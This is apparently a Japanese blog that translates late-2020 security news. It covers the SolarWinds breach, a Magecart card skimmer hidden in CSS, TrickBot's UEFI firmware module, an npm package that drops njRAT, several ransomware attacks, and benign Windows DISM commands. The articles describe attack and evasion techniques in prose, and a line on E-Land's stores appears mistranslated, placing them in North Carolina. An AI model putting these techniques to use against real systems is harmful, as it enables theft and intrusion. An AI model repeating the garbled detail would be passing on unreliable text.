      3-1、 dism /Image:Z: /Get-Drivers | moreを実行しインストールされているドライバのリストを表示する。これを実行すると、メモ帳が開きドライバリストが表示される。Ctrl+Fを使用して(検索ボックスが開く)探しているドライバを発見し、Published Name(oemxx.infのはずである)をメモする。
       3-2、 dism /Image:Z: /Remove-Driver /Driver:oemxxx.infを実行する。コマンドラインのoemxxx.infは、ステップ3-1でのPublished Nameである。
    、 exitとタイプし、Enterを押す。これでコマンドプロンプトが終了する。コンピュータを再起動し願いを込めなさい。
     他のユーザは、こと特別な情報を指摘している。
      ・ 「CorsairVBusDriver.sysドライバのインスタンスが複数あるかもしれないことを追加しておく。一つだけに気を配らないように(理解するのに時間がかかった)。」
      ・ 「上記ステップに従ったときの決定的な相違は、corsairvbusドライバーは見つかったが、ステップに示されているようなDriver.oemxxx.infとは呼ばれていなかったことである。正確なドライバー名は覚えていないが、あなたがドライバリストにアクセスできるのであれば corsairvbusドライバーが見つかるまで調べ続け、上記ステップのoemxxx.infの部分を自分のものに置き換えなさい。」

     問題が発生した場合や更なる支援を必要とするのであれば、このフォーラムトピックで様々な提案を読んだり、支援の要請を行うことができる。

    MicrosoftはSolarWindsハックでセキュリティ侵害されたことを確認した、他の感染は否定
    BleepingComputer : News>Security(2020/12/17)
     Microsoftは、最近SolarWinds攻撃ででハッキングされたことを認めたが、彼らのソフトウェアが、顧客に感染するためのサプライチェーン攻撃でセキュリティ侵害されたことは否定した。
     先週末、ロシアの国家支援ハッカーがトロイ化させたSolarWindsでセキュリティ侵害し、クライアントにバックドアを配布するために、Microsoftの自動アップデートを使用していたことが発見された。
     この悪意あるソフトウェアは、Solarigate (Microsoft)あるいはSunburst (FireEye)として追跡されているバックドアであり、およそ18,000の顧客(U.S. Treasury(米国財務省), US NTIA(米国国家電気通信情報管理庁), the U.S. Department of Homeland Security(米国国土安全保障省)を含む)のインフラストラクチャに到達している。
     今夜、ロイターは、そのレポートで、情報筋によると、MicrosoftがSolarWindsサプライチェーン攻撃でセキュリティ侵害されただけでなく、彼らのソフトウェアもまた、その顧客に悪意あるファイルを配布するために改竄されたことを示していると述べている。
     Frank Shaw(Microsoftの広報担当副社長)のTweetで、Microsoftは、現在発見されていることに基づいて、このレポートを否定した。Shawは、Microsoftが彼らの環境中に悪意あるSolarWindsバイナリを検出したことを認めたが、彼らのシステムは顧客をセキュリティ侵害するために使用されてはいないと述べている。
    BleepingComputerは、Microsoftにコンタクトし更なる質問をしたが、現時点で、その回答を受け取っていない。


    クレジットカード情報を盗み取るスクリプトはハッキングされたオンラインストアのCSSファイル中に隠されていた
    BleepingComputer : News>Security(2020/12/09)
     クレジットカード情報を盗み取るスクリプト(以降、クレジットカードスティーラ)は、進化しており、新しい隠蔽戦略に起因して検出することの困難さが増大している。最新の例は、セキュリティ侵害された店舗のページ中に紛れ込ませ、顧客の個人情報や支払い情報を盗むためにCSSコードを使用するWebスキマーである。
     CSSコード中に、彼らの支払い情報スティーラを隠すことによって、このスキマーの作成者達は、自動化されたセキュリティスキャナーによる検出をバイパスし、手動セキュリティコード検査で検証される時でさえ、あらゆるフラグを立てることを成功裏に回避している。
     これは、(セキュリティ)スキャナが一般的に、悪意あるコードに関してCSSファイルをスキャンしないことと、スキマーのトリガースクリプトがCSSページのカスタムプロパティ(変数)を読み込んでいることに、誰も見向きもしていなかったために発生している。
     CSS(Cascading Style Sheets)ファイルは、ルールのコレクションを使用しているWebドキュメントに対して、スタイル(例、フォント、色、スペース)を追加するための能力をWebサイトに提供するファイルである。

    CSSコード中に格納されているMagecartスクリプト リンク

     クレジットカードスキマー(Magecartスクリプトとしても知られる)は、オランダのサイバーセキュリティ企業Sansecの研究者によって、火曜日に3つの異なるオンラインストアで発見された。
     このWebスキマーは、SanSecがBleepingComputerに告げた今朝、少なくともひとつのストアで依然としてアクティブであったが、この企業は、このデータの重要な本質に起因する追加情報を共有していない。
     このマルウェアは明るみに出されたが、CSSベースのWebスキマーは、悪意あるスクリプトを挿入し、顧客の支払いカード情報を密かに抽出するために、徐々により高度なテクニックを「実験」することを開始したMagecartグループによって使用されてきた。

    Magecart CSSコード(画像をクリックすると拡大表示されます)

     このMagecartスクリプトは、セキュリティ侵害されたEコマースの顧客が支払い情報や個人情報の入力を開始した場合にのみ実行される。
     この買い物客達が注文フォームの確認ボタンを押した時、彼らは攻撃者の悪意あるCSSコードをロードされ解析される新しいページにリダイレクトされる。
     ハッキングされたオンラインストアの確認ページ上のJavaScriptパーサーもしくはトリガー スクリプトは、次に、ハッカーによって制御されている cloud-iq[.]net サーバ上のMagecartスクリプトを指し示す --script変数中のCSSコードに格納されているURLからスキマーをロードし実行する(【訳注】 上図参照)。
     この作戦は、これまでの方法では発見されないので、Magecartグループがセキュリティ侵害されたEコマースWebサイト上で丸見えにならないように彼らのクレジットカードスティーラを隠すことを可能にする。
     今週初めSansecが、これを発見したのは偶の偶然によって警告フラグをあげたのだろう。

    Magecart トリガースクリプト(画像をクリックすると拡大表示されます)

    コードの全てのビットは悪意ある目的のために使用される

     オンラインストアは、「実行資産だけでなく、彼らのデータの全てをモニターする必要がある」と、SansecはBleepingComputerに述べている。
     「これは、Eコマースマネージャにとっては、とても頭が痛いものである。今日はCSSだが、明日は、何処か他所の静的なデータであるだろう」
     クレジットカードスキマーとして知られるJavaScriptベースのスクリプトが、セキュリティ侵害されたEコマース サイトのページ中に挿入されて、顧客の支払い情報と個人情報を抽出するMagecart攻撃に対する防御のオプションを、オンライン買い物客は殆ど持っていない。
     「消費者は、夫々の取引に二要素認証を強制する銀行を選択すべきである」と、更に「これは、ヨーロッパにおいては大変一般的であるが、米国ではそうではない」と、Sansecは述べている。
     あなたが米国にいるのであれば、http://privacy.com(【訳注】 使い捨てバーチャルカード決済に関しては、こちら参照)や類似のプラットフォームで一時的なカード番号を取得するか、各取引にバーチャルカード(【訳注】 バーチャルカードのメリット・デメリットはこちら)を使用することができる。
     Sansecの研究者達は最近、SVGソーシャルメディアボタンとして非表示にできるWebスキミングマルウェアと、永続的なバックドアを同梱しているクレジットカード スティール マルウェアを削除することは、殆ど不可能であることを発見した。

    総合人材サービス会社Randstadが身代金要求型マルウェアに攻撃され重要なデータを盗まれた
    Graham Cluley : News(2020/12/07)
     世界最大級の総合人材サービス会社の一つが、それ自身で身代金要求型マルウェアの犠牲者になっていることを発見した。
     先週の木曜日に公開されたステートメントにおいて、Randstad(ランドスタッド)は、そのネットワーク上に「悪意ある挙動を最近確認した」と発言している。
     その悪意ある挙動は、Egregor身代金要求型マルウェアであった。そして、Randstadは、このセキュリティ侵害によって、操作は損なわれていないと発言しているが、ハッカーが重要なデータにアクセスし、その後、公開したことは認めている。
    「これまでの調査で、Egregorグループが、我々のグローバルIT環境および特定のデータ(取り分け、米国、ポーランド、イタリア、フランス)に対して非認証で不法なアクセスを取得していたことは明らかである。彼らは現在、そのデータのサブセットであると主張するものを公開している。」
     Randstadは、38カ国に38,000人を超える従業員を雇用しており、2019年では、2百万を超える求人者を支援し、28万のクライアント企業と仕事していることを誇りとしている。
     この企業は、「この悲しむべき重大事案を処理するために重要なリソースを捧げている」と発言しているが、より多くのデータを公にリークされることを妨げるために、攻撃の背後にいるサイバー犯罪者によって要求される身代金を支払うのか否かについては共有されていない。
     今年初め、悪名高いMaze身代金要求型マルウェアの悪漢共が引退した後、Egregor身代金要求型マルウェアが組織に感染しているとするレポートが急増している。
     Egregor身代金要求型マルウェアの他の最近の犠牲者は、メトロバンクーバー(【訳注】 カナダのブリティッシュコロンビア州南西部にある地方行政区の一つ(Wikipediaより))交通システム、ゲームメーカーUbisoft、南アメリカの小売大手Cencosudが含まれている。


    TrickBotの新しいモジュールは、UEFIファームウェアに感染することを目的にしている
    BleepingComputer : News>Security(2020/12/03)
     TrickBotマルウェアの開発者達は、UEFI(Unified Extensible Firmware Interface。【訳注】 オペレーティングシステムとプラットフォームファームウェアとの間のソフトウェアインタフェースを定義する仕様(Wikipediaより))の脆弱性を探る新しいモジュールを作成し、感染したマシンを究極にコントロールできるレベルで攻撃を仕掛けようとする攻撃者の取り組みを実演している。
     UEFIファームウェアへのアクセスで、脅威のアクター(【訳注】 ブラックハットハッカーのような脅威となる行為主体のこと)は、セキュリティ侵害されたマシンに、オペレーティングシステムの再インストールやストレージドライブの置き換えに影響されない持続的有効性を設立することができる。
     このファームウェアに植え付けられた悪意あるモジュール(bootkits、【訳注】 rootkitsの改良版(中小企業情報セキュリティ.comより))は、コンピュータのブートシーケンスの初期段階で、他の物に先立ってロードされるため、オペレーティングシステム上で動作するセキュリティソフトからは不可視になる。
     Bootkitsは、システムのブートプロセス操作を制御することが可能であり、より高いレベルで防御を妨害することができる。このコードは最も早い段階で実行されるため、Secure Bootメカニズム(【訳注】 コンピュータ起動時の安全性を確保するため、デジタル署名で起動するソフトウェアを検証する機能。UEFI(BIOS)の機能として提供され、OSに関係なく利用できる(IT用語辞典より))は、このファームウェアが無傷であることが前提であるため、助けにならない。
     脅威のアクターにマシン上にこの種の永久的な存在を取得されることに関連する影響は、膨大であり、TrickBotの場合は尚更である。TrickBotの一日平均の感染数は数千に上る。

    Intelプラットフォームをターゲットにしている

     本日の共同報告書において、サイバーセキュリティ企業Advanced Intelligence (AdvIntel、【訳注】 米国の詐欺対策を専門とする企業(WatchGuardより)) とハードウェアとセキュリティ企業Eclypsiumの研究者達は、TrickBotの新しいコンポーネントの技術的詳細を提供した。
     TrickBotは、この段階で偵察衛星のように振る舞い、感染したマシンのUEFIファームウェア中の脆弱性をチェックする。現時点では、この確認はIntelプラットフォーム(Skylake, Kaby Lake, Coffee Lake, Comet Lake)だけを標的にしている。更に、このモジュールはまた、読み込み、書き込み、ファームウェアを削除するコードを含んでいるので、重要なダメージを与えるために使用される。
     このモジュールは、RWEverything(システムのBIOS/UEFIファームウェアを格納しているSPIフラッシュメモリのようなハードウェアコンポーネントにアクセスができるフリーのユーティリティ)のRwDrv.sysドライバを使用して、UEFI/BIOS書き込み保護がアクティブであるか否かをチェックする。
     このツールの名前に心当たりがあるのは、APT28(Fancy Bear, Sednit, Strontium, Sofacy)として知られるロシアのハッカーの攻撃において、オンライン上で最初に発見されたUEFIルートキットであり、LoJaxによって使用されたからである。

    「SPIフラッシュチップに格納されているUEFIファームウェアに対する全てのリクエストは、IntelプラットフォームのPlatform Controller Hub (PCH)の一部であるSPIコントローラを経由する。このSPIコントローラは、アクセス コントロール メカニズムを含んでいる。これは、SPIフラッシュメモリチップ中に格納されているUEFIファームウェアの非認証セキュリティ侵害を防ぐためにブートプロセスの間ロックされる。」 共同レポート(Eclypsium, AdvIntel)より。

    BIOS/UEFI書き込み保護は、最新システム上で利用可能であるが、この機能はしばしば、アクティブでなかったり、間違って設定されているために、攻撃者がこのファームウェアをセキュリティ侵害したり、あるいは、デバイスを操作不能にすることが可能である。
     この研究者達は、10月19日に、このモジュールを発見し、配備されるこのボットネットの機能と名前をもじって、TrickBotと名付けた。
     Advanced Intelligenceが解析したサンプルで、この研究者達は、新しいTrickBotのサンプルに“user_platform_check.Dll”ファイルに関連付けられた名前“PermaDll”を発見した。
     Eclypsiumでのこのファイルの調査は、この脅威のアクターが、セキュリティ侵害したシステムにシングルチップ チップセット(【訳注】 一つの集積回路上に演算・記憶などのすべての機能をまとめたチップセット(コトバンクより))をチェックするメカニズムを実装していたことを明らかにした。

    (画像をクリックすると拡大表示されます)

     研究者達は、このモジュールの役割がPCHクエリを実行し、システム上でPCHを実行する特定のモジュールを決定し、従って、プラットフォームを同定することであること発見した。この情報はまた、攻撃者がそのプラットフォームに脆弱性があるか否かをチェックすることを可能にする。

    (画像をクリックすると拡大表示されます)

     この研究者達はまた、このアクターが既知のファームウェア脆弱性攻撃の関数と、以下の目的のためにfwexplと呼ばれるライブラリに依存していることを発見した。
    ・ ハードウェアのIOポートからデータを読む
    ・ rwdrv.sysドライバをコールし、ハードウェアのIOポートにデータを書き込む
    ・ rwdrv.sysドライバをコールし、物理メモリアドレスからデータを読み込む
    ・ rwdrv.sysドライバをコールし、、物理メモリアドレスにデータを書き込む
     この研究者達は、TrickBotがLook UPテーブルに存在していないプラットフォーム上で実行されている場合、ハードウェアアクセスを要求する操作のDefault値のpre-Skylakeセットで関数をアクティベートしていると記している。
     プラットフォームを同定した後、TrickBotは、フラッシュメモリ(SPIBAR, PRO-PR4)とBIOSコントロール(BC - ハードウェアレベルでのBIOSアクセスするための書き込み保護ロック ビットを含む)のためのレジスタを読み込むための関連するパスにアクセスする。

    (画像をクリックすると拡大表示されます)

    BIOS書き込み保護を無効にしようとする関数中の興味ある発見は、BIOS Write Protection Disableビットが設定されているか否かをチェックするためのBIOS Controlレジスタ中で、間違ったオフセットから読み込むバグを含んでいることであった。
     このコードの結果は、書き込み保護がアクティブであると判断し、それを無効化しようとする。

    コメントはEclypsium(画像をクリックすると拡大表示されます)

    主たる影響

     このようなモジュールを開発しているTrickBotは、このアクターがセキュリティ侵害したシステムの支配を拡張するための努力をしていることを明瞭に示している。このボットネットは既に、このアクターが多くの脆弱性のあるターゲットから選択した数千のマシンを感染させている。
     AdvIntelのテレメトリ(遠隔情報収集)は、10月3日から11月21日までのTrickBotによる一日の感染数の最大値は40,000であり、一日の平均感染数は200から4000であることを示している。これらの数値は、ゲートウェイのIPアドレスを使用して外部と通信しているプライベートネットワーク上のコンピュータを計算していないため控えめな数値である。
     最も利益をあげられる犠牲者の選択は、犠牲者のネットワーク、ハードウェア、ソフトウェアから情報を抽出する偵察スクリプトを介して引き出されるデータに基づいて手動で実行されている。

    (画像をクリックすると拡大表示されます)

     このオペレータ達は経済的な動機を持っており、ボットネットを使用してRyukやConti身代金要求型マルウェアを高い利益をあげられるマシンに配布している。2018年以来、彼らは少なくとも1億5000万ドルを得ている。最近1人の犠牲者だけから、彼らは2,200BTC(現時点で3400万ドルの価値)を奪っている
     TrickBotは、銀行詐欺や金融/個人情報の盗難を含む、複数の金儲け計画に関与している、当にサイバー犯罪企業である。

    (画像をクリックすると拡大表示されます)

    高価値のマシン上にUEFIレベルの持続的有効性を獲得すると、彼らは幾つかの方法でこの有利の地歩を使用することができるので、アクターの利益を最大化することができる。
     身代金の引き上げ交渉における影響力として、UEFIインプラントの使用とは別に、サイバー犯罪者は、犠牲者がシステムをTorickBotのコントロールから切り離すために身代金を支払った後でさえ、マシンにアクセスすることができる。
     後に、犠牲者がクリーニングとリカバリプロセスを完了したあとでも、この攻撃者はUEFI中に継続して存在している有利の地歩を利用して、新しい攻撃を実行することができる。攻撃者達はまた、アクセス認証情報のセットを収集し、他の悪漢共に販売することもできる。
     これは、大規模運用環境と重要なインフラストラクチャに影響を与えるので、純粋に破壊を目的とする作戦に使用することができるだろう。デバイスを操作不能にする他の効果は、法医学的調査を大変困難にし、リカバリプロセスを大幅に遅くし、セキュリティの他のレイヤーを破壊することである。

    厳しい防衛行動

     Eclypsiumの主任研究員Jesse Michaelは、システムがUEFIファームウェア レベルでセキュリティ侵害されているか否かを決定することは、大変困難な仕事であるとBleepingComputerに告げている。
     より徹底的な方法として、SPIフラッシュ プログラミング デバイスを物理的に接続することによって、システムをパワーダウンした時に、SPIメモリチップ上のコンテンツを読み込むことである。しかしながら、この解決策は、専門知識だけでなく、チップがマザーボードに半田付けされている場合には、その企業のダウンタイムが長くなるし、読み込み問題のリスクがある。
     他の方法は、オープンソースツール(CHIPSEC)もしくは、ハードウェアやファームウェアでローレベルの弱点を調査し、BIOS書き込み保護がアクティブか否かを決定することもできるEclypsiumのプラットフォームを使用することである。
     ファームウェアのハッシュをチェックすることは、このコードが改竄されているか否かを決定する助けになる。更に、ファームウェアをアップデートすることは、必ず既知の脆弱性の影響を受けなくなるので適切な方法である。
     UEFIレベルのセキュリティ侵害は、Hacking TeamのVectorEDK UEFIインプラント コードがリークされ、公に利用されるようになって以来5年以上経つ今日でさえ稀である。
     現時点で、この種の公に確認された攻撃は、VectorEDKコードを使用する非常に高度なもの(ロシアのハッカー集団Lojaxや中国のハッカーMosaicRegressorのような国家をバックに持つ脅威のアクター)から出現している。
     しかしながら、可能な限り多くのシステムに感染し、そのプール(【訳注】 ある目的のためにデータを格納するために確保される記憶装置の部分(コンピュータ用語辞典より))から利益をあげられるターゲット(あらゆる分野の大企業)を選択することを目的とするTrickBotとは異なり、これらの敵からの攻撃は、大変標的化されている。
     TrickBootのサンプルの解析から、このモジュールは、ハードウェアを同定し、BIOS領域が書き込み可能か否かをチェックするだけである。しかし、これは、SPIフラッシュメモリへの書き込みや、システムファームウェアの改竄を可能にするために簡単に変更することができる。
     AdvIntelEclypsiumからの技術レポートは、この新しいモジュール用にVitali Kremezによって作成されたYaraルール(【訳注】 オープンソースのマルウェアの検知・解析ツール「YARA」で使用される記述形式で、マルウェアの特徴を記述するもの(ZDNetより))と共に、TrickBootに関するセキュリティ侵害の痕跡を提供している。


    悪意あるNPMパッケージがnjRATリモートアクセス・トロイをインストールするために使用されている
    BleepingComputer : News>Security(2020/12/01)
     新しい悪意あるNPMパッケージが発見された。これは、ハッカーがコンピュータのコントロールを奪うために、njRATリモートアクセス・トロイをインストールするものである。
     NPMは、開発者やユーザがパッケージをダウンロードし、それらをプロジェクトに統合することを可能にするJavaScriptパッケージマネージャである。
     NPMはオープンエコシステムなので、誰もが、マルウェアに関する検証やスキャンを実行されることなく新しいパッケージをアップロードすることができる。この環境は、100万の豊富で多様なパッケージのリポジトリをきたしたが、この環境はまた、脅威のアクターが悪意あるパッケージを簡単にアップロードすることもできる。

    njRATをインストールする悪意あるNPM

     本日、オープンソース・セキュリティ企業Sonatypeは、悪意あるNPMパッケージがJSONファイルから作成された合法なツールであるかのように装っていることを発見した
     これらのパッケージは、'jdb.js'とか'db-json.js'と呼ばれていた。このファイルは、NPMによって削除されている。しかし、以下のスクリーンショットから確認できるように、それらは、プロジェクトに新しい機能を追加するために使用することのできる無害のパッケージのように見える。

    NPM上のJsonDB(db-json.js)パッケージ(画像をクリックすると拡大表示されます)

     db-json.js用のpackage.jsonファイルから確認できるように、依存関係として、'jdb.js'と呼ばれる他のパッケージを含んでいる。このpackage.jsonファイルは、db-json.jsパッケージをインストールする時に、NPMに自動的にそのパッケージ(jdb.js)をインストールさせる。

    db-json用のpackage.json(画像をクリックすると拡大表示されます)

     jdb.jsパッケージは、以下に示したようにmodule.js, package.json, patch.exe実行ファイルを含んでいる。インストールされると、インストール時に自動的に起動するように設定されているため、NPMは自動的にmodule.jsを自動的に実行する。

    jdbパッケージのコンテンツ(画像をクリックすると拡大表示されます)

     以下に見られるように、このJSスクリプトは、強く難読化されているが、pach.exe実行ファイルを起動する。これは、njRATマルウェアである。

    難読化されたJavaScriptファイル(画像をクリックすると拡大表示されます)

     インストールされると、njRATは、脅威のアクターに犠牲者のコンピュータに対する完全なリモートアクセスを与える。そこで、以下の悪意ある挙動を実行することができる。
    ・ Windowsレジストリを改竄する
    ・ ファイルの作成と削除
    ・ ファイルをアップロードする
    ・ コマンドを実行する
    ・ そのコンピュータの情報を取得する
    ・ コンピュータを乗っ取る
    ・ キーストロークをログする
    ・ パスワードを盗む
    ・ プロセスを終了する
    ・ スクリーンショットを取る
     以下の画像で、あなたは、njRATを介して脅威のアクターが送信できるコマンドの一部を示しているソースコードの断片を見ることができる。

    逆コンパイルされたnjRATソースコード(画像をクリックすると拡大表示されます)

     各パッケージは夫々、凡そ100回ダウンロードされているが、SonatypeのAx Sharmaは、悪意のあるNPMが十分に活用される前に捕まえたと信じていると、BleepingComputerに語った。
     この一年間、マルウェアをインストールする、あるいは、悪意ある挙動を実行するNPMパッケージを発見することは一般的に増加傾向にある。
     最近、NPMは、Discord(【訳注】 ビデオ通話・音声通話・VoIPフリーウェア(Wikipediaより))トークンを盗んだり、Google Chrome, Brave Browser, Opera, Yandex Browserからブラウザ情報を盗むために使用されていることを発見した後、'fallguy'や'discord.dll' という悪意あるパッケージを削除した。
     悪意あるNPMプロジェクトは、合法なプロジェクトに似た名前を付けるのが一般的になっているので、開発者は、彼らのプロジェクトに統合するパッケージに詳細な注意を払わなければならない。


    バグだらけのWindows 10機能更新プログラムを元に戻すための時間を拡張する方法
    BleepingComputer : News>Security(2020/11/29)
     Defaultで、Microsoftは、ユーザに新たなWindows 10機能更新プログラムをアンインストールし、オペレーティングシステムを直前の状態に戻す期間を10日に設定している。
     この記事では、OSのアンインストール・ウィンドウを使用して、新しいWindows 10機能更新プログラムのテスト期間を増やす方法を示す。
     新しいWindows 10機能更新プログラムをインストールした後に、バグ、パフォーマンス問題、クラッシュが発生し、このバグ群が修正されるまで、機能更新プログラムをアンインストールすることが要求されるのは毎度のことである。
     Windows 10を直前のバージョンに戻すには、スタート > 設定 > 更新とセキュリティ の下に発見されるリカバリ(回復)画面に進む。そこで、「前のバージョンの Windows 10 に戻す」の下にある「開始する」ボタンをクリックすることで、直前のバージョンに戻すことができる。

    Windows 10リカバリ設定画面(画像をクリックすると拡大表示されます)

     Windows 10機能更新プログラムをインストール後、10日以上経過しているのであれば、「開始する」ボタンは以下に示すようにグレーアウトしているだろう。そして、この機能更新プログラムを削除することはできない。

    直前の設定に戻すことはできない(画像をクリックすると拡大表示されます)

     Windows 10の新しいバージョンをアンインストールする時間を増やしたい人は、コマンドラインツールであるDeployment Image Servicing and Managementツール(DISM.exe、展開イメージのサービスと管理) を使用することができる。

    Windowsの機能更新プログラムのアンインストール期間を増やす方法

     先述したように、あなたが新しい機能更新プログラムをインストールした後、OSを直前のバージョンに戻すための時間を、Microsoftは10日に設定している。
     管理者権限でのコマンドプロンプトから、以下のDISMコマンドを使用して、アンインストール設定の値を検索することができる。

    DISM /Online /Get-OSUninstallWindow

    以下に示したように、BleepingComputerが、この新しい機能更新プログラムをインストールした後、アンインストール期間は、Defaultの10日に設定されていた。

    DISM /Online /Get-OSUninstallWindowコマンド(画像をクリックすると拡大表示されます)

     Windows 10機能更新プログラムをアンインストールする日数を増やすには、DISMを /Set-OSUninstallWindow 引数付きで以下の書式で実行する。

    DISM /Online /Set-OSUninstallWindow /Value:[days]

     OSをアンインストールする日数は、2から60日である。2より少なく、60より大きな値を指定した場合は、アンインストールの日数はDefaultの10日に設定される。
     例えば、OSをアンインストールする日数を59日に設定したいのであれば、以下に示したように、DISM /Online /Set-OSUninstallWindow /Value:59 コマンドを実行しなさい。

    OSのアンインストール期間を59日に設定(画像をクリックすると拡大表示されます)

     大多数の人々は、この設定を変更する必要はないし、10日間は、Windows 10の新しいバージョンを使用するか否かを決定するには十分な時間である。
     クリティカルタスク(【訳注】 プロジェクトの全工程を線で結んだ時に最長となる経路上に存在している作業)を実行しているコンピュータや、近い将来にハードウェアのアップグレードを計画している場合には、アンインストールの期間を増やすことは、新しい機能更新プログラムやハードウェアの変更をテストする時間が十分に取れるので、賢明なことかも知れない。
     このように、何らかの問題が発生した場合、簡単にこの機能更新プログラムをアンインストールし、バグの修正がリリースされるのを待って、再びアップグレードすることができる。


    IIoTチップメーカーAdvantechが身代金要求型マルウェア攻撃され、身代金1250万ドルを要求されている
    BleepingComputer : News>Security(2020/11/28)
     Conti身代金要求型マルウェアの悪漢共は、産業オートメーションと産業IoT(IIoT)のチップメーカAdvantech(【訳注】 台湾のマザーボードおよび産業用向けコンピューターメーカー(Wikipediaより))を攻撃し、影響を受けたシステムを復号するために1400万ドルの身代金を支払えば、盗んだ企業データのリークを停止するとしている。
     Advantechは、世界中の92の大都市に8000人を超える従業員を抱える、IT製品とソリューション(組込コンピュータ、ネットワークデバイス、IoT、サーバー、ヘルスケア・ソリューションを含む)産業の世界的企業である。
     この企業は2018年には世界の市場占有率34%を占める世界の産業用コンピュータのリーダーであり、2019年では、年間売上高17億ドルと報告されている。

    身代金は750Bitcoinに設定されている

     BleepingComputerが確認したチャットのログによると、Advantechネットワーク攻撃の背後にいるContiのオペレータは、全データを復号し、Advantechのサーバから盗んだデータを削除するための身代金を750BTC(本日の換算レートで約$12,600,000)に設定している。
     Contiはまた、彼らの復号操作がキチンど動作することの証明として、身代金を支払う前に二つの暗号化されたファイルを復号する意思があると発言している。
     この身代金要求型マルウェアのオペレータは、2020年11月21日に、翌日までにAdvantechから対応がない場合には、盗んだデータの一部をリークすると追加している。

    (画像をクリックすると拡大表示されます)

    11月26日、このグループは、ransomware data leakサイトでAdvantechのデータを3.03GBのアーカイブとして公開することを開始した。このZIPアーカイブには、盗まれたデータの2%と、ファイルのリストが付属するテキストドキュメントが含まれている。
     この身代金要求型マルウェアの悪漢共はまた、身代金が支払われた場合には、即座にこの企業のネットワークに配備した全てのバックドアを削除し、更なるセキュリティ侵害を防止するためのネットワークを安全にする方法に関するセキュリティ上のヒントを提供すると宣言している。
     彼らはまた、支払いが実行されたなら、盗んだ全てのデータは削除されると発言しているが、身代金要求型マルウェア攻撃との交渉企業Covewareの研究者は、身代金を支払ったところで、一部の身代金要求型マルウェア攻撃作戦は、実際にはファイルを削除していないと述べている。
     この企業は、彼らのシステムに対する身代金要求型マルウェア攻撃の有無に関して何ら声明を公に発行していないが、BleepingComputerは、ContiのオペレータがAdvantechの暗号化されたシステム上に残した脅迫文のコピーを入手した。
     Advantechの広報担当者は、本日までBleepingComputerによる問い合わせに対して、即座にコメントできていない。

    (画像をクリックすると拡大表示されます)

    Conti身代金要求型マルウェア

     Conti身代金要求型マルウェアは、2019年末に分離攻撃で最初に発見され、2020年6月この攻撃は増加した。
     この身代金要求型マルウェアは、悪名高きRyuk身代金要求型マルウェアとコードを共有し、2020年7月にRyukの活動が減少した後、トロイの木馬TrickBotによって開かれたリバースシェル(【訳注】 ターゲット端末から攻撃端末に対して接続する方法(Qiitaより))を介して配布され始めた。
     Contiオペレータは、企業ネットワークをセキュリティ侵害し、彼らがデバイスの暗号化に使用する身代金要求型マルウェアのペイロードを配備することが可能なドメイン管理者の認証情報にアクセスできるまで、横方向に拡散する。
     Contiは、経験豊富なハッカーを募集している。これは巨額の身代金の分け前と引き換えに身代金要求型マルウェアを配備するプライベートRansomware-as-a-Service(RaaS、【訳注】 身代金要求型の不正プログラムであるランサムウェアをサービスとして取引するビジネスモデルのこと(Tokio Cyber Portより))作戦のためである。2020年8月mContiは、26人の犠牲者で独自のデータ漏洩サイトを開設した。


    米国Canonは身代金要求型マルウェア攻撃を受け、データが盗まれたことを認めた
    BleepingComputer : News>Security(2020/11/26)
     Canonは、8月初めの身代金要求型マルウェアによるサイバー攻撃で、ハッカーに、この企業のサーバからデータを盗まれたことを最終的に公に認めた。
     BleepingComputerは、クラウドの写真とビデオのストレージサーバ(image.canon)に、ユーザのファイルが失われる疑わしい休止状態を追跡した後、この攻撃に関して最初にレポートした。

    盗まれた従業員データ

     8月5日、Canon USAは、広範なシステムの問題を従業員に通知した。これは、複数のアプリケーション(Teamsとその中での電子メール)が利用できなくなったとするものであった。
     BleepingComputerによる脅迫文の部分的なスクリーンショットは、この休止状態が、Maze身代金要求型マルウェア(一般的に改竄されたネットワークから盗まれたデータを利用して、犠牲者に支払い圧力をかけるグループ)によって発生させられたことを示している。

    (画像をクリックすると拡大表示されます)

     Canonは、この重大事案の調査を開始し、7月20日から8月6日の間に、彼らのネットワーク上に未認証の活動があった証拠を発見した。
     この脅威のアクターは、2005年から2020年の間の現在と過去の従業員と、彼らの受益者と扶養家族に関する情報をホストしていたファイルサーバにアクセスしている。
     水曜日の公式アナウンスでは、Canonは、この攻撃者によってアクセスされたデータは、従業員名、社会保障番号、誕生日、運転免許証番号、政府発行ID(【訳注】 パスポート等)、Canonから直接振り込まれる銀行口座番号、従業員の電子署名が含まれると発言している。
     この攻撃直後、Maze身代金要求型マルウェアの悪漢共は、8月5日にファイル暗号化マルウェアを実行する前にデータと個人データベースの10TBをCanonから盗んだと、彼らはBleepingComputerに告げている。
     驚いたことに、この攻撃によって発生したimage.canonの問題とCanon USAの一般的な休止状態は無関係であった。Mazeは、彼らの行動がストレージサーバにまで及んでいないと認めている。
     身代金要求型マルウェア攻撃を公に確認するのに3か月かかったが、Canonは、8月6日の内部セキュリティ通知において、このセキュリティ上の重大事案の性質について従業員に対して認めた。

    (画像をクリックすると拡大表示されます)

    Mazeは、もうこの世にいない

     Mazeサイバー犯罪グループは、身代金要求型マルウェア・ビジネスの大立者の一つであった。11月1日、この悪漢共は凡そ1年半前(2019年5月)に開始した彼らの作戦を終了した。
     彼らは、今日殆どの身代金要求型マルウェア攻撃作戦が採用している二重恐喝(暗号化する前にデータを盗み、被害者が身代金を支払わない限りファイルを漏洩させると恐喝する)の原因となる行動をしたものである。
     Mazeの犠牲者の中には、Allied Universal(米国を拠点とする米国のセキュリティ施設サービス会社)、Southwire(米国のワイヤー、ケーブル、ツール、コンポーネント、および組み立てソリューションのメーカー)、City of Pensacola(フロリダ州ペンサコーラ市)、Canon(米国キャノン)、LG Electronics(LGエレクトロニクス)、Xerox(ゼロックス)などの重要な企業が含まれている。


    韓国の小売大手E-Landは、身代金要求型マルウェアでの攻撃により店舗の臨時休業を余儀なくされている
    BleepingComputer : News>Security(2020/11/22)
     韓国の複合企業であり小売大手のE-Landは、身代金要求型マルウェアによる攻撃を受け、この攻撃を処理する間、23の小売店舗の臨時休業を余儀なくされている。
     E-Landは、主としてアパレルを中心とする60の小売ブランドを所有し、5000のフランチャイズ店舗で販売している。更に、E-Landは、韓国内でホテルやレストランも所有し運営している。
     韓国メディアの聯合ニュースによると、E-Landは、週末に身代金要求型マルウェア攻撃を受け、ノースカロライナ州の50のデパートの内の23とNewCore Outlet(韓国のアウトレットモール)小売店舗の臨時休業に追い込まれた。
     本日、Chang-Hyun Seok(E-Land RetailのCEO)は、サイバー攻撃を認め、この身代金要求型マルウェアが、11月22日の朝にE-Landの本社に配備されたと述べている。
     この身代金要求型マルウェアの拡散を防ぐために、E-LandはITシステムの一部をシャットダウンしたので、一部小売店舗に影響を与えることになった。
